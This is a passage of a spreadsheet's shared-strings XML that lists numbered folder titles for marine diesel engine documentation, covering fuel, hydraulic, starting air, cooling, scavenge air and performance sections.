    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3055-0155 Turboch. Lubr. Oil Sys</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3070-0600 Cylinder Lubr. Test To</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3465-0200 Starting Air Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3465-0201 Starting Air Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3465-0500 Starting Air Distribut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3465-0501 Starting Air Distribut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3472-0500 Starting Air Distribut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3472-0200 Starting Air Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3472-0900 StartingAir Safety Cap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3472-0300 Main Starting Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3472-0150 S.A.S., Air Reciever</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3455-0100 Starting Air System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3455-0101 Star Air Sys MC-S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3472-0140 S.A.S., Reduction St.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3470-0100 Start.Air Sys.Pan.Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3470-0110 Start. Air System Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0100 Fuel Oil HP Pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0101 Fuel Oil HP Pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0200 Fuel Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0201 Fuel Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0300 FuelValve SpindleGuide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0301 FuelValve SpindleGuide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0400 F.ValveNon-returnValve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0401 F.ValveNon-returnValve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0500 Fuel Oil Press.Booster</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0501 Fuel Oil Press.Booster</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0600 F.O.Pres.BoostTopCover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0601 F.O.Pres.BoostTopCover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0700 F.O.P  B Suction Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0701 F.O.P  B Suction Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0800 Fuel Pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0801 Fuel Pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0900 Fuel Pump Top Cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-0901 Fuel Pump Top Cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1000 Fuel Pump Barrel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1001 Fuel Pump Barrel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1100 F. Pump Suction Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1101 F. Pump Suction Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1200 F. Pump Puncture Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1201 F. Pump Puncture Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1300 F. Syst.Shock Absorber</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1301 F. Syst.Shock Absorber</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1400 Fuel Pump Lifting Gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1401 Fuel Pump Lifting Gear</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1500 Fuel Pump Settings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1501 Fuel Pump Settings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1600 VIT System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4265-1601 VIT System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-0010 Fuel System Panel Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-0220 Fuel valve Test Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-0900 Fuel Pump Top Cover To</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-0230 Fuel V. Inspection Too</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-0210 Fuel Valve Nozzle Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4272-0500 Fuel O. Press. Booster</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4272-0200 Fuel Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4272-0100 Fuel Oil High-Pressure</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4272-0010 Fuel Oil System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4272-0020 Fuel Oil System, Detai</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4272-1300 Fuel Oil Shock Absorbe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4245-0100 Fuel Oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4245-0110 Pressurised Fuel Oil S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4245-0120 Fuel Treatment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4255-0100 Residual Fuel Standard</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4255-0105 Fuel Oil System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4255-0110 Fuel Pipes on Engines</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4255-0115 Fuel Oil Centrifuges</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4255-0120 Centrifuge Flow Rate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4255-0125 Preheating of Fuel Oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Not used, feel free /DNN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4255-0126 FO sys, FW homogenizer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4272-0030 FO Sys. By-pass Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-0200 Fuel Valve Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-0240 VOC Press.Test. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-0250 VOC Adapter Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-0800 Fuel Pump Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-0810 Fuel Pump Hydr. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-0820 Fuel Pump Lift. Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-0830 Fuel Pump Barrel Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-1100 FP Suction Valve Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4270-1200 FP Puncture Valve Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0100 Gear Drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0101 Gear Drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-1000 Hydraulic Power Supply</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-1001 Hydraulic Power Supply</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0300 Hydraulic System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0301 Hydraulic System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0100 Exhaust Valve Actuator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0101 Exhaust Valve Actuator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0600 Control Valves</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0601 Control Valves</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0500 Hydraulic Cylinder Uni</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0501 Hydraulic Cylinder Uni</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0550 Accumulators</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0551 Accumulators</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4572-0100 Exhaust Vle Actuator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4572-0500 Hydraulic Cyl. Unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4572-0550 HCU, Accumulators</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4572-1000 Hydr Power Supply Unit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4570-0550 Accumulator Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4572-0800 Hydraulic Low-Pressure</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4272-0900 Hydraulic High-Pressur</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4570-0540 Equip. for test accus</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4545-0100 Hydr. System ME-B Eng.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4572-1100 Hydraulic Pump Station</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4572-1200 Hydr. Power Sup. Gearb</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4572-1250 Hydr. P. Sup. Gearb Pi</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0100 Gear Dr. HPS/ELFI/ELVA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0105 Gear Dr. HPS, FIVA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0110 Gdr. HPS/ELFI, Sep LPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0115 Gdr. HPS/FIVA, Sep LPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0120 ELdr. HPS/FIVA Sep LPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0125 ELdr HPS/FIVA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0130 6L42MC/ME KMU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0135 Comb HPS/Com. LPS/FIVA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0140 Comb HPS/Sep. LPS/FIVA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0145 Gdr HPS/FIVA/Com LPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0150 Leak detec. Hyd Sys</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0155 Th Vlv FO Pres. Boost.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0160 Drainholes HCU block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0165 Lvl sw ME Cyl Lub</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0170 HydCon Oil Sys Sep LPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0171 Double Wall Piping</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0180 ME-B EL-Driven HPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-1200 HPS Gearbox Data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-1201 HPS Gearbox</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0200 Hydraulic Oil Pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4565-0201 Hydraulic Oil Pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4545-0150 Hydr. System ME Engine</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0146 GD.HPS,Com.LPS V5 RexP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0146 GD.HPS,Com.LPS V6 RexP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0147 GD.HPS,Com.LPS V5 EatP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0147 GD.HPS,Com.LPS V6 EatP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0148 GD.HPS,Com.LPS V4 RexP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0148 GD.HPS,Com.LPS V5 RexP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0149 GD.HPS,Com.LPS V4 EatP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4555-0149 GD.HPS,Com.LPS V5 EatP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4572-0700 Hydraulic Accu. Block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4572-0750 Hydraulic Valve Block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4570-0100 Exh.Valve Actuat.Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4570-0900 Main Hydr. Pipe Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4572-0110 Exh. Actuator- Inlet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>- ej brugt -</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4765-0200 Pick-Up Arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4765-0201 Pick-Up Arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4765-1900 MultiPurposeController</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4765-1901 MultiPurposeController</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4765-0400 Pressure Sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4765-0401 Pressure Sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4772-0700 Oil Mist Detector</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4772-1500 Engine Control System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4772-1600 Local Control Box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4772-1550 Engine C.S. Components</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4765-1000 Cable Connections</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4765-1001 Cable Connections</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4772-1800 Pneumatic Components</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4772-0100 Pressure Sensors</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4772-0200 Temperature Sensors</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4740-0100 Electronics</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Folder title</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5072-0100 Cooling Water Pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5045-0100 Cooling Water System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5045-0200 Cooling Water Treatmen</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5055-0100 Seawater Cooling Syste</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5055-0105 Jacket Cooling Water S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5055-0110 Central Cooling System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5055-0115 Preheating of Jacket C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0100 Scav.Air CoolerElement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0101 Scav.Air CoolerElement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0200 Water Mist Catcher</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0201 Water Mist Catcher</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0300 Sc.Air Butterfly Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0301 Sc.Air Butterfly Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0400 Sc.Air Non-ReturnValve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0401 Sc.Air Non-Return Valv</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0500 Auxiliary Blower</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0501 Auxiliary Blower</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0600 Scav.A.R. Safety Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0601 Scav A.R. Safety Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0700 Turbocharger Cleaning</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5465-0701 Turbocharger Cleaning</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5470-0120 S. A. C. LIFTIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5470-0110 SCAV. AIR COOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5470-0700 TURBOCHARGER TO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0130 A. C. Pipe Connections</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0750 Turbocharger Connectio</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0600 Scavenge Air Reciever</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0620 S.A.R, Safety Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0630 Scavenge Air Pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0500 Auxilliary Blower</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0900 Exhaust Reciever</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0910 Scav. Air Rec., Detail</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0930 Exh. Reciever By-Pass</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0110 Scav. Air Cooler Frame</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0120 Air C. Cleaning System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0400 S.A. Cooler Non-return</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0100 Scavenge Air Cooler</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0200 Water Mist Catcher</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5455-0100 Scav. Air Drain Pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5455-0105 Scav. Air Fire Extingu</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5455-0110 Dry Clean. Turbocharge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5455-0115 Water Clean. Turboch.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5455-0120 Air Cool. Cleaning Sys</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0300 Butterfly Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5472-0350 Suction Pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5455-0125 VT Principal Diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5455-0130 VT El. DiagraMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5445-0200 VT System</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5470-0130 Aux. Blower Lift. Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5455-0135 Bypass Syst.Princ.Dia</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5455-0140 Bypass Syst.Electr.Dia</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5445-0300 Exhaust By-pass Valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5470-0100 Air Cool+TC Panel Tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5470-0900 Exhaust Receiver Tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6345-0200 IMO NOx Comp and Techn</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6345-0300 Observ. During Operat.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6345-0310 Evaluation of Records</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6345-0320 Clean. Turboch AirCool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6345-0330 Measuring Instruments</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6345-0340 Press Meas. Eng. Power</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6345-0350 Corre. Perfor. Paramet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6345-0360 Turbocharger Effecienc</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6345-0370 Est. Effective Power</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0100 Load Diag. Prop. Alone</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0105 Load Diag. Prop. Gener</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0110 Performance Observatio</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0115 Thermodynamic Conditio</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0120 Synop. Dia. Engine Pi</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0125 Synop. Dia. Engine Pma</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0130 Synop. Dia. Engine Pe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0135 Synop. Dia. Turbo. Pe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0140 Synop. Dia. Turbo. Com</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0145 Synop. Dia. Turbo. Tai</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0150 Specf. FuelOil Consump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0155 Normal Indicator Diagr</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0180 Corr. ISO Ref. Ambient</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0205 Calc. Compressor Eff.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0210 Calc. Turbocharge Eff.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0215 Power Estimation</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0220 Turbo Compr. Wheel Dia</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6345-0100 Testbed adjustment</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0185 Corr. ISO Ambient TExh</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0190 Corr. ISO Ambient Pcom</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0195 Corr. ISO Ambient PSca</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6355-0200 Corr. ISO Ambient Exam</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6340-0100 Performance</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6665-0100 Special Running</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6665-0101 Special Running</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0321 Cyl. Lub. Back-up sign</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6670-0100 Tool for Special Runni</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0100 Check During Standstil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0110 Preparation f Starting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0120 Starting-up</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>6645-0130 Loading</t>
